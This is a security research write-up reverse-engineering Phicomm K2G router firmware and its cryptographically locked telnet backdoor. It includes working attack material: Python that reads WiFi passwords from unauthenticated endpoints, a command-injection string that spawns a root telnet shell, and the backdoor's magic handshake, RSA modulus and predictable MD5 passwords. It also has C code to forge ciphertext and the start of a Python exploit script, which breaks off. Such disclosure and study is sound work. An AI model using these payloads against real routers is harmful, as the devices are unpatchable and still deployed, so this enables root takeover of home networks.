
A Backdoor Lockpick

Reversing Phicomm’s Backdoor Protocols

TL;DR

  1. Phicomm’s router firmware has numerous critical vulnerabilities that can be chained together by a remote, unauthenticated attacker to gain a root shell on the device.
  2. Every Phicomm router firmware since at least 2017 exposes a cryptographically locked backdoor.
  3. I’ve analysed this backdoor’s network protocol through three distinct iterations, across eleven firmware versions.
  4. And I show how the backdoor’s cryptographic lock can be “picked” to grant a root shell to an attacker.
  5. Phicomm is no more. These devices will never be patched.
  6. Not only are Phicomm devices still on the market, but their surplus is being resold by other vendors, such as Wavlink, who occasionally neglect to reflash the device and ship it with the vulnerable Phicomm firmware.

A Phicomm in Wavlink’s Clothing

In early September, 2021, a fairly ordinary and inexpensive residential router came into the Zero Day research team’s possession.

The WAVLINK AC1200, an inexpensive WiFi Router.

It was branded as a Wavlink AC1200 WiFi Router, a model that you can find on Amazon for under $30.

When I plugged in the router and attempted to navigate my browser to its administrative interface — which, according to the sticker on the bottom of the router, should have been waiting for me at 192.168.10.1 — things took an unexpected turn. The router’s DHCP server, to begin with, had assigned my machine an address on the 192.168.2.0/24 subnet, with 192.168.2.1 as its default gateway.

And this is what was waiting to greet me:

This doesn’t look like WAVLINK firmware…

If the Amazon reviews for the WAVLINK AC1200 are anything to go by, I wasn’t alone in this particular situation.

Quite suspicious!

With a little help from Google Translate, I set about exploring this unexpected Phicomm interface. The System Status (系统状态) page identifies the device model as K2G, hardware version A1, running firmware version 22.6.3.20.

The System Status (系统状态) page in the Phicomm firmware’s administrative web UI.

An online search for “Phicomm K2G A1” turned up a few listings for this product, which indeed bears a striking resemblance to the “WAVLINK” router we’d received from Amazon. In many cases the item was listed as “discontinued”.

This looks familiar.
A familiar looking router, with the original Phicomm branding.
Do you see the difference? (The branding is the difference.)

I take a stab at reconstructing the story of how, exactly, K2G A1 routers with Phicomm firmware made their way to the market with WAVLINK branding in the Appendix to this post, but first let’s look at a few particularly interesting vulnerabilities in this misbegotten router.

How to Get the Wifi Password

It’s never a good idea to enable remote management on a residential router, but that rarely prevents vendors from offering this feature, and there will always be users unable to resist the temptation of exposing their LAN’s controls to the Internet at large, nominally protected by a flimsy password authentication mechanism at best.

Like many other residential routers, the Phicomm K2G A1 provides this feature, and a quick perusal of Shodan shows that remote management’s been enabled on many such devices.

If the user decides to enable remote management, the UI will suggest 8181 as the default port for the administrative web interface, and 255.255.255.255 as default netmask (which will expose port 8181 to the entire WAN, which in the case of most residential networks means the Internet).

A basic Shodan search suggests that plenty of users (most of them in China) have made precisely these choices when setting up their routers.

A shodan.io search, showing some results consistent with the remote management interface on certain Phicomm routers.
A shodan.io search for “port:8181 luci”, many of whose results bear a very close resemblance to the remote-management webserver on the Phicomm K2G router.

Access to the admin panel itself requires knowledge of the password that the user chose when setting up the router. Phicomm allows the user to save several seconds and ease the burden of memory by clicking a checkbox and setting the admin password to be the same as the 2.4GHz wireless password.

The Phicomm firmware’s administrative web server exposes a number of interfaces, such as /LocalMACConfig.asp or /wirelesssetup.asp, which can be used to get and set router configuration parameters without requiring any authentication whatsoever. This is especially hazardous when remote management has been enabled, since it effectively grants administrative control of several router settings to any passer-by on the internet, and discloses some highly sensitive information.

For example, if you’re curious what devices might be connected to the router’s local area network, all you need to do is issue a request to http://10.3.3.12:8181/LocalClientList.asp?action=get (assuming 10.3.3.12 is the router’s IP address and 8181 is its remote management port):

A screenshot showing how a LAN directory can be obtained from the management webserver without authentication.
Obtaining LAN information from the Phicomm management webserver, without authentication.

Here we see the Kali and pfSense VMs I’ve connected to the Phicomm router, along with an iPad that’s spoofing its MAC address.

But suppose we’d like to connect to this LAN ourselves. If the router’s nearby, we could try to connect to one of its WiFi networks. But how do we get the password? It turns out that all you need to do is ask and the router will gladly provide it:

Screenshot showing how the WiFi passwords can be obtained without authentication.
Obtaining the WiFi passwords from the remote management service without authentication.
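
As a concrete illustration, here is a minimal Python sketch of the kind of unauthenticated queries shown above. The endpoint names and the action=get parameter come straight from the firmware; the structure of the JSON responses is an assumption based on the screenshots, so the sketch simply prints the raw response bodies.

import requests

# The router's address and remote-management port (8181 is the UI's suggested default);
# substitute the target's actual address.
TARGET = "http://10.3.3.12:8181"  # example address used elsewhere in this post

# No session, no cookie, no password: these endpoints answer anyway.
clients = requests.get(f"{TARGET}/LocalClientList.asp", params={"action": "get"}, timeout=5)
wifi = requests.get(f"{TARGET}/wirelesssetup.asp", params={"action": "get"}, timeout=5)

print("LAN clients:", clients.text)     # device names, MACs and IPs of everything on the LAN
print("Wireless settings:", wifi.text)  # includes the WiFi passwords in the clear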

If the owner of that router had taken Phicomm up on its suggestion that they use the same password for both the 2.4GHz wireless network and the administrative interface, then you now have remote administrative access to the router as well.

Screenshot of the Phicomm admin panel.
Phicomm explicitly offers to set the web admin password to the 2.4GHz WiFi password.

But even if you’re not so lucky, there are a number of setting operations that the pseudo-asp endpoints enable as well.

A screenshot of the Phicomm router’s web admin UI, showing the LAN information.
The LAN information page in the administrative web UI.
A screenshot showing how to rename hosts on the target’s LAN.
You can use the unauthenticated remote management endpoint to rename hosts on the target’s LAN.
The results of this renaming attack. This is a vector for pushing potentially malicious content into the administrative web UI.

If we were feeling a little less kind, or felt that this was a network that was best avoided and decided to take matters into our own hands, we could use the same interface to ban local users from the network.

From the WAN side, we are also able to ban users from the LAN, without needing any prior authentication.
What the unfortunate client sees in their browser after being banned in this way.

This type of ban only bars access to the router and the WAN, and can be easily evaded by changing the client’s MAC address.

Changing the MAC address to evade the ban.

An unbanning request for a particular MAC address can be issued by setting the BlockUser parameter to 0.

[+] Requesting url http://10.3.3.12:8181//LocalMACConfig.asp?action=set&BlockUser=0&MAC=A6%3aDC%3a5C%3aF6%3a2C%3a2B&IP=unknown&DeviceRename=kali&isBind=0&ifType=0&UpMax=0&DownMax=0&_=1642459782743
{'retMACConfigresult': {'ALREADYLOGIN': 0, 'MACConfigresult': 1}}
We see that the ban depends on the MAC address of the LAN-side client. We also see that this ban can be lifted in much the same way that it was imposed, by a WAN-side machine issuing unauthenticated requests.

The library responsible for handling these .asp endpoints is the lighttpd module, mod_mobileapp.so. Of the 68 or so endpoints defined by the administrative interface, 18 can be triggered without requiring any authentication from the user. These include wirelesssetup.asp and any bearing the prefix Local:

LocalCheckClientNumber.asp
LocalCheckDetectFinish.asp
LocalCheckInetHealthStatus.asp
LocalCheckInetLinkStatus.asp
LocalCheckInetSpeedStatus.asp
LocalCheckInterfacelink.asp
LocalCheckNetworkType.asp
LocalCheckRouterPassword.asp
LocalCheckWIFI.asp
LocalCheckWanStatus.asp
LocalCheckWifiPassword.asp
LocalCheckWirelessStatus.asp
LocalClientList.asp
LocalIndex.asp
LocalMACConfig.asp
LocalNetworkSet.asp
LocalStartAutodetect.asp
wirelesssetup.asp

Escalating from an Authenticated Admin Session to a Root Shell on the Router

Suppose that you’ve managed to access the admin panel on a Phicomm K2G A1 router, thanks to the careless exposure of the admin password through the unauthenticated /wirelesssetup.asp?action=get endpoint. Obtaining a root shell on the device is now fairly straightforward, due to a command injection vulnerability in the Phicomm interface, which appears to be already well known among Phicomm router hackers. UpanTool has provided a comprehensive writeup documenting this attack vector (Google Translate can be helpful here if, like me, you can’t read Chinese).

A screenshot of a post-auth command injection attack, courtesy of UpanTool.

The command injection attack is triggered by submitting the string | /usr/sbin/telnetd -l /bin/login.sh where the firmware update menu asks for a time of day at which to check for updates. The router will pass the time of day given to a shell command, which it will run with root privileges, and the pipe symbol | will instruct it to send the output of the first command to a second, which is supplied by the attacker. The injected command, /usr/sbin/telnetd -l /bin/login.sh, opens a root shell that the attacker can connect to over telnet, on port 23.

This was indeed the method I used to obtain a root shell, explore the router’s runtime environment, and download its firmware to my workstation for further analysis. (I did this the easy way, by piping each block device through gzip and over netcat to my host, and then extracting the filesystems with binwalk.)

Verification that the command injection attack documented by UpanTool works.
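
Once the injected telnetd is up, confirming the root shell is as simple as poking TCP port 23. A quick sketch (the banner contents depend on what /bin/login.sh prints; the point is only that the port now answers):

import socket

ROUTER = "192.168.2.1"  # the default gateway address the Phicomm firmware handed out; adjust as needed

# After submitting "| /usr/sbin/telnetd -l /bin/login.sh" in the update-schedule field,
# port 23 should accept connections and drop us straight into a root shell.
with socket.create_connection((ROUTER, 23), timeout=5) as s:
    print("telnet is listening, first bytes:", s.recv(256))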

The first thing I wanted to do when I got there was to look at the output of netstat -tunlp to see what other services might be listening on this device.

Using netstat on the router to find which services are listening on which UDP and TCP ports.

Notice the service listening on UDP port 21210, which netstat identifies as telnetd_startup. This service provides a cryptographically locked backdoor into the router, and in the next section, we’re going to see, first, how the lock works, and second, how to pick it.

Reverse Engineering the Phicomm Backdoor

The Phicomm telnetd_startup service superficially resembles Netgear’s telnetEnable daemon, and serves a similar purpose: to allow an authorized party to activate the telnet service, which will, in turn, provide that party with a root shell on the router. What distinguishes the Phicomm backdoor is not just its elaborate challenge-and-response protocol, but that it requires that the authorized party employ a private RSA key to unlock it. This requirement, however, is not foolproof, and a critical loophole in telnetd_startup allows an attacker to “pick” the cryptographic lock without any need of the key.

Initial State

telnetd_startup begins by listening unobtrusively on UDP port 21210. Until it receives a packet containing the magic 10-byte handshake, ABCDEF1234, it will remain completely silent. Nmap will report UDP port 21210 as open|filtered, and provide no clue as to what might be listening there.

Control flow diagram of the main event loop in the telnetd_startup binary.

If the service does receive the magic handshake, it will respond with a UDP packet of its own, carrying a 16-byte buffer. An analysis of the daemon’s binary code reveals the tell-tale constants of an MD5 hash function, which would be consistent with the length of 16 bytes.

Disassembly of the block of code in telnetd_startup that initializes the hasher used to produce the product-identifying message. This hasher can be recognized as MD5 by its tell-tale constants.

void md5_init(uint *context)
{
    *context = 0;
    context[2] = 0x67452301;
    context[1] = 0;
    context[3] = 0xefcdab89;
    context[4] = 0x98badcfe;
    context[5] = 0x10325476;
    return;
}
Control-flow diagram of the hashing function, recognizable as MD5.
void md5_add(uint *param_1, void *param_2, uint param_3)
{
    uint uVar1;
    uint uVar2;
    uint __n;

    uVar2 = (*param_1 << 0x17) >> 0x1a;
    uVar1 = param_3 * 8 + *param_1;
    __n = 0x40 - uVar2;
    *param_1 = uVar1;
    if (uVar1 < param_3 * 8) {
        param_1[1] = param_1[1] + 1;
    }
    param_1[1] = param_1[1] + (param_3 >> 0x1d);
    if (param_3 < __n) {
        __n = 0;
    }
    else {
        memcpy((void *)((int)param_1 + uVar2 + 0x18), param_2, __n);
        FUN_00402004(param_1 + 2, param_1 + 6);
        while( true ) {
            uVar2 = 0;
            if (param_3 < __n + 0x40) break;
            FUN_00402004(param_1 + 2, (int)param_2 + __n);
            __n = __n + 0x40;
        }
    }
    memcpy((void *)((int)param_1 + uVar2 + 0x18), (void *)((int)param_2 + __n), param_3 - __n);
    return;
}
The block of code responsible for sending the product-identifying hash back to the client that sends the router the initiating handshake token (“ABCDEF1234”).

With a bit of help and annotation, Ghidra decompiles that code block into the following C-code:

memset(&K2_COSTDOWN__VER_3.0_at_00414ba0, 0, 0x80);
memcpy(&K2_COSTDOWN__VER_3.0_at_00414ba0, "K2_COSTDOWN__VER_3.0", 0x14);
memset(md5, 0, 0x58);
md5_init(md5);
md5_add(md5, &K2_COSTDOWN__VER_3.0_at_00414ba0, 0x80);
md5_digest(md5, &HASH_OF_K2_COSTDOWN_at_4149a0);
MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30 = 0;
DAT_00414b74 = 0;
DAT_00414b78 = 0;
DAT_00414b7c = 0;
memcpy(&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
       &HASH_OF_K2_COSTDOWN_at_4149a0,
       0x10);
sendto(SKT,
       &MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
       0x10,
       0,
       &src_addr,
       addrlen);
CHECK_STATE_004147e0 = 0;

The string that gets hashed here is "K2_COSTDOWN__VER_3.0", a product identification string, which is first copied into a zeroed-out buffer 128 bytes in length. This can easily be verified.

Verification that the product-identifying message does indeed contain an MD5 hash of a descriptive string found in the telnetd_startup binary.

After this exchange, a global variable at address 0x004147e0 is switched from its initial value of 2 to 0, and the main loop of the server enters another iteration. What we’re looking at, here, is a finite state machine, and the handshake token, "ABCDEF1234" is what sends it from the initial state into the second.
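
Here is a small Python sketch of that first exchange, which doubles as the verification mentioned above: send the magic handshake, then check that the 16 bytes that come back are the MD5 of the product string zero-padded to 128 bytes. This assumes the daemon’s MD5 routine matches the standard algorithm, which is what the constants above suggest.

import hashlib
import socket

ROUTER = "192.168.2.1"  # the K2G's LAN address in my setup; adjust as needed
PORT = 21210            # telnetd_startup's UDP port

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)

# State 1 -> 2: the magic 10-byte handshake.
sock.sendto(b"ABCDEF1234", (ROUTER, PORT))
product_hash, _ = sock.recvfrom(1024)

# The daemon hashes "K2_COSTDOWN__VER_3.0" copied into a zeroed 0x80-byte buffer.
expected = hashlib.md5(b"K2_COSTDOWN__VER_3.0".ljust(0x80, b"\x00")).digest()
print("received:", product_hash.hex())
print("expected:", expected.hex())
print("match:   ", product_hash == expected)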

Second State

Control flow diagram of the next stage of the protocol, where the second message received from the client is “decrypted” using a hard-coded public RSA key, a random secret is generated, and then the “decrypted” message is XORed with the random secret, which is then used to generate ephemeral passwords by the set_telnet_enable_keys() function.

In the second state, shown above, in basic block graph form, and below, decompiled into C code, five important things happen after the client replies to the message containing the product-identifying hash:

S = ingest_token(payload_buffer, 2);
if (S != 2) {
    memset(&PAYLOAD_00414af0, 0, 0x80);
    memcpy(&PAYLOAD_00414af0, payload_buffer, number_of_bytes_received);
    S = rsa_public_decrypt_payload();
    if (S != 0) break;
    CHECK_STATE_004147e0 = 1;
    generate_random_plaintext();
    rsa_encrypt_with_public_key();
    sendto(SKT, &ENCRYPTED_at_4149f0, 0x80, 0, &src_addr, addrlen);
    xor_decrypted_payload_with_plaintext();
    set_telnet_enable_keys();
    goto LAB_00401e1c;
}

1. Decryption of the client’s message with a public key

The reply, which is assumed to have been encrypted with the client’s private key, is then decrypted with a public RSA key that’s been hardcoded into the binary.

It’s unclear exactly what the designers of this algorithm expect the encrypted blob to contain, and indeed there’s nothing in what follows that would really constrain its contents in any way. This step to some extent resembles the authentication request stage of the SSH public key authentication protocol. This is where the client sends the server a request containing:

  1. the username,
  2. the public key to be used, and
  3. a signature

The signature is produced by first hashing a blob of data known to both parties — the username, for example, or session ID — and then encrypting that hash with the private key that corresponds to the public key sent in (2). Something similar seems to be taking place at this stage of the Phicomm backdoor protocol, except that the content of the “signature” isn’t checked in any way. There’s no username, after all, for the client to provide, and just a single valid keypair in play, which is determined by the server’s own hardcoded public key. (Thanks to my colleague, Katie Sexton, for highlighting this resemblance and helping me make sense of this stage of the protocol.)

Control flow graph of the function that “decrypts” the client’s message using the hardcoded public RSA key.

Note the constant 3 (RSA_NO_PADDING) passed to the OpenSSL library function RSA_public_decrypt, which specifies that no padding is to be used. This will make our lives significantly easier in the near future.

int rsa_public_decrypt_payload(void)
{
    RSA *rsa;
    BIGNUM *a;
    int n;
    uint digest_len;
    size_t length_of_decrypted_payload;
    BIGNUM *local_18 [3];

    rsa = RSA_new();
    local_18[0] = BN_new();
    a = BN_new();
    BN_set_word(a, 0x10001);
    BN_hex2bn(local_18,
              "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
    rsa->e = a;
    rsa->n = local_18[0];
    memset(&DECRYPTED_PAYLOAD_at_4149d0, 0, 0x20);
    n = RSA_size(rsa);
    digest_len = RSA_public_decrypt(n,
                                    &PAYLOAD_00414af0,
                                    &DECRYPTED_PAYLOAD_at_4149d0,
                                    rsa,
                                    RSA_NO_PADDING);
    if (digest_len < 0x101) {
        length_of_decrypted_payload = strlen(&DECRYPTED_PAYLOAD_at_4149d0);
        n = -(length_of_decrypted_payload < 0x101 ^ 1);
    }
    else {
        n = -1;
    }
    return n;
}

Bizarrely, telnetd_startup at no point compares the result of this “decryption” with anything. It seems to rest content so long as the decryption function doesn’t outright fail, or yield a buffer of more than 256 bytes in length – which I’m not quite sure is even possible in this context, barring an undetected bug.

The n-component of the public key is stored in the binary as a hexadecimal string, and can be easily retrieved with the strings tool. The e-component is the usual 0x10001.

$ strings -n 256 usr/bin/telnetd_startup       
E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691

An interesting question to ask, here, might be this: what’s the point of this initial exchange? An initial handshake is sent to the router, the router sends back a 16-byte message that uniquely identifies the model, and the router then expects the client to reply with a message encrypted with a particular private key. Why the handshake ("ABCDEF1234")? Why the product-identifying hash? Why not begin the interaction with the signed or “privately encrypted” message? This protocol would make sense if the client, whoever that might be, is expected to be in possession of a database that associates each product-identifying hash it might receive with its own private RSA key. If that were the case, then we might be looking at a particular implementation of a general backdoor protocol.

2. A random secret is generated

A random secret consisting of exactly 31 printable ASCII characters is generated. That these characters are printable will turn out to be a helpful constraint.

Control-flow graph of the function that generates a random, 31-character secret.

3. The random secret is encrypted

The random secret is then encrypted using the hardcoded public RSA key, such that the only feasible way to decrypt it will be with the corresponding private key.

int rsa_encrypt_with_public_key(void)
{
    RSA *rsa;
    BIGNUM *a;
    int iVar1;
    BIGNUM *local_18 [3];

    rsa = RSA_new();
    local_18[0] = BN_new();
    a = BN_new();
    BN_set_word(a, 0x10001);
    BN_hex2bn(local_18,
              "E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691");
    rsa->e = a;
    rsa->n = local_18[0];
    memset(&ENCRYPTED_at_4149f0, 0, 0x80);
    iVar1 = RSA_size(rsa);
    iVar1 = RSA_public_encrypt(iVar1,
                               &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0,
                               &ENCRYPTED_at_4149f0,
                               rsa,
                               3);
    return iVar1 >> 0x1f;
}

4. The random, plaintext secret is XORed with the client’s message

This seems like a particularly strange move to me, a needless twist of complexity that, far from improving the security of the system, will afford a means for completely undoing it. The “decrypted” message received from the client in step 1 of state 2 — “decrypted”, remember, with the public key — is bitwise-xored with the random secret.

Control-flow graph of the function that calculates the bitwise-XOR of the random secret and the result of “decrypting” the client’s second message.
void xor_decrypted_payload_with_plaintext(void)
{
    byte *pbVar1;
    byte *pbVar2;
    int i;
    byte *pbVar3;

    i = 0;
    do {
        pbVar1 = &DECRYPTED_PAYLOAD_at_4149d0 + i;
        pbVar2 = &RANDOMLY_GENERATED_PLAINTEXT_at_4149b0 + i;
        pbVar3 = &XORED_MSG_00414b80 + i;
        i = i + 1;
        *pbVar3 = *pbVar1 ^ *pbVar2;
    } while (i != 0x20);
    return;
}

5. The resulting string is used to construct ephemeral passwords

Here’s where things truly break down. The string produced by XORing the random plaintext secret with the client’s “decrypted” message is concatenated with two hardcoded salts: "+PERM" and "+TEMP". The resulting concatenations are then hashed with the same MD5 algorithm used earlier to produce the product identifier. The resulting 16-byte hashes are then set as the ephemeral passwords that, if correctly guessed, will allow the client to unlock the backdoor.

int set_telnet_enable_keys(void)
{
    size_t xor_str_len;
    char xor_str_perm [512];
    char xor_str_temp [512];
    uint md5 [22];

    sprintf(xor_str_perm, "%s+PERM", &XORED_MSG_00414b80);
    sprintf(xor_str_temp, "%s+TEMP", &XORED_MSG_00414b80);
    memset(md5, 0, 0x58);
    md5_init(md5);
    xor_str_len = strlen(xor_str_perm);
    md5_add(md5, xor_str_perm, xor_str_len);
    md5_digest(md5, &TELNET_ENABLE_PERM_at_414c20);
    md5_init(md5);
    xor_str_len = strlen(xor_str_temp);
    md5_add(md5, xor_str_temp, xor_str_len);
    md5_digest(md5, &TELNET_ENABLE_TEMP_at_0x414c30);
    return 0;
}

Can you see the problem here? Think it over. We’ll come back to this in a minute.

Verifying Things in GDB

Once I had a general idea of how all the pieces fit together, I wanted to test my understanding of things by pushing a static MIPS build of gdbserver to the router, and then step through the telnetd_startup state machine with gdb-multiarch and my favourite gdb extension library, gef.

As I understood it, telnetd_startup was expecting me, the client, to decrypt its secret message using the private RSA key that corresponds to the public key coded into the binary. Since I did not, in fact, possess that key, and since OpenSSL’s RSA implementation seemed like a tough nut to crack, I figured I could verify my conjectures by simply cheating: I used the debugger to grab the random plaintext secret from the buffer at address 0x004149b0, salted it with the suffix "+TEMP", MD5-hashed it, and sent back the result. This was enough to drive the state machine to its final destination, where system("telnetd -l /bin/login.sh") is called and the backdoor is thrown wide open. So long as I chose, for my second message, a string that I knew the hardcoded public RSA key would “decrypt” into a buffer of null bytes — and this is rather easy to do — this method reliably produced the correct ephemeral password. It gave me a pretty good indication of what we need to do in order to open the backdoor without the assistance of a debugger, and without peeking at memory that, in a realistic scenario, an attacker would have no means of seeing.

Screenshot of a debugger session (gdb-multiarch + gef), a python REPL, and a telnet session that shows how by reading the random secret directly from memory we can calculate the ephemeral password needed to initialize a telnet session. The client’s second message, in this scenario, is chosen so that the hardcoded public RSA key “decrypts” it to a buffer of null bytes.

What this proves is that all we need to do in order to open the backdoor is to either discover the private RSA key, or else guess the 31-character secret string. The odds of guessing a random string at that length are abysmal, and so, armed with the public RSA key, I focussed, at first, on rummaging around the internet for some trace of that key (in various formats) in hopes that I might find the complete key pair just lying around. A long shot, sure, but worth checking. It did not, however, pay off.

At this point I still hadn’t quite noticed the critical loophole that I mentioned earlier. It came while I was patiently sketching out the protocol diagram, shown below.

The Backdoor Protocol

Here is a complete protocol diagram of the Phicomm backdoor, as apparently intended to be used:

Picking the Backdoor’s Lock

Remember how I said, regarding step 5 of state 2, that things break down in the construction of the two ephemeral passwords? The first thing to observe here is how the XORed strings are concatenated with the two salts:

sprintf(xor_str_perm,"%s+PERM",&XORED_MSG_00414b80);
sprintf(xor_str_temp,"%s+TEMP",&XORED_MSG_00414b80);

We can expand XORED_MSG_00414b80 to make its construction a bit clearer, like so:

sprintf(xor_str_temp,
        "%s+TEMP",
        xor(SECRET_PLAINTEXT,
            RSA_public_decrypt(HARDCODED_PUBLIC_KEY,
                               ENCRYPTED_XOR_MASK)));
temp_password = MD5(xor_str_temp);

And mutatis mutandis for +PERM. Now, the format specifier %s, as used by sprintf, is not meant to handle just any byte array whatsoever. It’s meant to handle strings — null-terminated strings, to be precise. The array of bytes at &XORED_MSG_00414b80 might, in the mind of the developer, be 31 bytes long, but in the eyes of sprintf() it ends where the first null byte occurs.

If the value of the first byte of that “string” is zero (i.e, '\x00', not the ASCII numeral '0'), then %s will format it as an empty string!

If &XORED_MSG_00414b80 is treated as an empty string, then xor_str_temp and xor_str_perm are just going to be "+TEMP" and "+PERM". The random component is completely dropped! Their MD5 hashes will be entirely predictable. When that happens, this code

memset(md5,0,0x58);  
md5_init(md5);
xor_str_len = strlen(xor_str_perm);
md5_add(md5,xor_str_perm,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_PERM_at_414c20);
md5_init(md5);
xor_str_len = strlen(xor_str_temp);
md5_add(md5,xor_str_temp,xor_str_len);
md5_digest(md5,&TELNET_ENABLE_TEMP_at_0x414c30);

will produce precisely these two hashes:

In [53]: salt = b"+TEMP" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[53]: 'f73fbf2e90e43136f07279c745f2f9f2'
In [54]: salt = b"+PERM" ; MD5.MD5Hash(salt + b'\x00' * (0x58 - len(salt))).digest().hex()
Out[54]: 'c423a902bacd28bafd095350d66e7455'

What this means is that all we have to do to produce a situation where we can predict the two ephemeral passwords is to make it likely that

XORED_MSG_00414b80[0] == DECRYPTED_PAYLOAD_at_4149d0[0] ^ RANDOMLY_GENERATED_PLAINTEXT_at_4149b0[0] == '\x00'

This turns out to be easy.
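
To make the consequence of that %s concrete, here is a tiny Python model of what the daemon ends up hashing. C’s sprintf stops copying at the first null byte, so the model truncates there before appending the salt (standard MD5 is assumed purely for the sake of illustration):

import hashlib

def ephemeral_password(xored_msg: bytes, salt: bytes) -> bytes:
    # sprintf("%s...") only ever sees the bytes up to the first '\x00'.
    as_c_string = xored_msg.split(b"\x00", 1)[0]
    return hashlib.md5(as_c_string + salt).digest()

secret = b"A" + b"x" * 30        # stand-in for the 31-character random secret
decrypted = b"A" + b"\x00" * 31  # our "decryption" happens to share its first byte

xored = bytes(a ^ b for a, b in zip(decrypted, secret.ljust(32, b"\x00")))
assert xored[0] == 0  # the first byte cancels out...
# ...so the "string" is empty and the password depends only on the bare salt:
print(ephemeral_password(xored, b"+TEMP").hex())
print(ephemeral_password(b"\x00" * 32, b"+TEMP").hex())  # identical, and fully predictable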

In the absence of padding (i.e., when the padding argument is set to RSA_NO_PADDING, which equals 3), RSA_public_decrypt() will “successfully” transform the vast majority of 128-byte buffers into non-null buffers. Just to get a ballpark idea of the odds, here’s what I found when I used the hardcoded public RSA key to “decrypt” 1000 random buffers in the Python REPL:

In [23]: D = [pub_decrypt(os.urandom(0x80), padding=None) for i in range(1000)]      
In [24]: len([x for x in D if x and any(x)]) / len(D)                                                                                                                                                
Out[24]: 0.903

Over 90% came back non-null. If the padding variable were set to RSA_PKCS1_PADDING, by contrast, we’d be entirely out of luck. Control of the plaintext would be virtually impossible:

In [85]: D = [pub_decrypt(os.urandom(0x80), padding="pkcs1") for x in range(1000)]
In [86]: len([x for x in D if x and any(x)]) / len(D)
Out[86]: 0.0

What this means is that so long as the server uses a padding-free cipher, we don’t actually need the private key in order to have some control over what RSA_public_decrypt() does with the message we send back to telnetd_startup at the beginning of State 2.

So, what kind of control are we after here? Simple: we want the first byte of the “decrypted” buffer to be printable. Why? Because the one thing we know about the random plaintext secret is that it’s composed of printable bytes, that is, bytes that fall somewhere between 0x21 and 0x7e, inclusive.

In [25]: len([x for x in D if (0x21 <= x[0]) and (x[0] < 0x7f)]) / len(D)                                                                                                                      
Out[25]: 0.372

So that winds up being true of about 37% of random 128-byte buffers.
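
The pub_decrypt helper used in these REPL snippets isn’t shown, but with RSA_NO_PADDING the “public decryption” is just the textbook RSA public operation, c^e mod n. A minimal stand-in (not necessarily the exact helper I used), with the modulus recovered by strings above:

import os

E = 0x10001
N = int("E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691", 16)

def pub_decrypt(ciphertext: bytes) -> bytes:
    """Raw (no-padding) RSA public operation, returned as a 128-byte buffer."""
    return pow(int.from_bytes(ciphertext, "big"), E, N).to_bytes(0x80, "big")

# Rough odds that a random 128-byte blob "decrypts" to something whose
# first byte is printable (0x21..0x7e), as discussed above:
D = [pub_decrypt(os.urandom(0x80)) for _ in range(1000)]
print(sum(0x21 <= x[0] < 0x7f for x in D) / len(D))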

Here’s a bit of C-code that will whip up some phony ciphertext, meeting these fairly broad specifications.

unsigned char *find_phony_ciphertext(RSA *rsa) {
    unsigned char *phony_ciphertext;
    unsigned char phony_plaintext[1024];
    int plaintext_length;

    memset(phony_plaintext, 0, 0x20);
    phony_ciphertext = calloc(PHONY_CIPHERTEXT_LENGTH, sizeof(char));
    do {
        random_buffer(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
        phony_ciphertext[0] || (phony_ciphertext[0] |= 1);
        plaintext_length = decrypt_with_pubkey(rsa, phony_ciphertext, phony_plaintext);

        if ((plaintext_length < 0x101) &&
            (0x21 <= phony_plaintext[0]) &&
            (phony_plaintext[0] < 0x7f)) {
            printf("[!] Found stage 2 payload:\n");
            hexdump(phony_ciphertext, PHONY_CIPHERTEXT_LENGTH);
            printf("[=] Decrypts to (%d bytes):\n", plaintext_length);
            hexdump(phony_plaintext, plaintext_length);
            return phony_ciphertext;
        }
    } while (1);
}

Once we’ve generated such a buffer, we then have a 1 in 94 (0x7f - 0x21) chance of having a message whose “decryption”, via the hardcoded RSA key, begins with the same character as the random secret plaintext. Those are astronomically better odds than trying to guess a 31-character string (a 1 in 94^31 chance) or a 16-byte hash (a 1 in 2^128 chance).

If we guess right, then the ephemeral password to temporarily enable telnetd will become MD5("+TEMP"), and the ephemeral password to permanently enable it will become MD5("+PERM").

And in this fashion we can gain an unauthenticated root shell on the Phicomm router after somewhere in the ballpark of one hundred guesses.
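
Putting the pieces together, the whole attack fits in a few dozen lines of Python. What follows is only a sketch of the logic in the proof of concept described below: the message framing, and the assumption that each failed round resets the state machine, come from my reading of the binary; the modulus is the one recovered above; and the candidate password is the MD5 value computed earlier for the degenerate "+TEMP" case.

import os
import socket
import time

E = 0x10001
N = int("E541A631680C453DF31591A6E29382BC5EAC969DCFDBBCEA64CB49CBE36578845C507BF5E7A6BCD724AFA7063CA754826E8D13DBA18A2359EB54B5BE3368158824EA316A495DDC3059C478B41ABF6B388451D38F3C6650CDB4590C1208B91F688D0393241898C1F05A6D500C7066298C6BA2EF310F6DB2E7AF52829E9F858691", 16)
ROUTER, PORT = "192.168.2.1", 21210  # substitute the router's address
TEMP_PASSWORD = bytes.fromhex("f73fbf2e90e43136f07279c745f2f9f2")  # hash for the degenerate "+TEMP" case, as computed above

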